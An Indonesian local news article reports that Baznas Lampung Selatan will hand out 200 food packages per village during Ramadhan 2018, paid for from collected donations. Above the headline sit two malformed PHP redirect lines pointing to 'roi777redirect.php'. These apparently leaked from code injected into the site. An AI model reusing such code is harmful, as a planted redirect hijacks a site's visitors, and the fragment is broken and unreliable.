header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); 200 Paket Sembako Siap Dibagikan Baznas Lamsel -
200 Paket Sembako Siap Dibagikan Baznas Lamsel

TRANSLAMPUNG.COM, KALIANDA –  Badan Amil Zakat Nasional (Baznas) Lampung Selatan menjelang 10 hari di bulan Ramadhan 1439 akan membagikan paket sembako kepada masyarakat tidak mampu.

“Paket sembako yang akan dibagikan pada Ramadhan 2018 ini lebih banyak dari tahun 2017 lalu sebanyak 100  bungkus per desa. Di tahun 2018 ini sebanyak 200 bungkus per desa,” kata Kepala Baznas Lampung Selatan Burhanuddin, ketika ditemui di lingkup Kantor Bupati Lamsel, Senin (16/4).

Lebih lanjut dikatakan Burhan, apa yang menjadi harapan Bupati Lampung Selatan Zainudin Hasan, untuk dibagikan paket sembako tersebut agat tiap warga Lamsel ikut merasakan terutama orang-orang membutuhkannya dan masyarakat tidak mampu atau fakir miskin.

“Kami sudah bekerja maksimal. Allhamdulillah, pada tahun 2018 ini paket sembako yang akan dibagikan ketiap warga Lampung Selatan bisa lebih banyak dibandingkan tahun lalu,” ujarnya.

Mengenai sumber dana untuk pembelian paket sembako tersebut, ditambahkan dia bersumber dari infak dan shodakoh yang dikumpulkan oleh Baznas Lampung Selatan berasal dari perorangan, kelompok, pengusaha dan para pegawai serta masyarakat umum.

“Pengumpulan zakat, infak dan shodakoh selama satu tahun ini nanti akan dibagi habis pada Ramadhan ini. Dimana, hingga kini terdapat saldo mencapai Rp1 miliaran lebih,” pungkasnya. (jhn/hkw)

News Reporter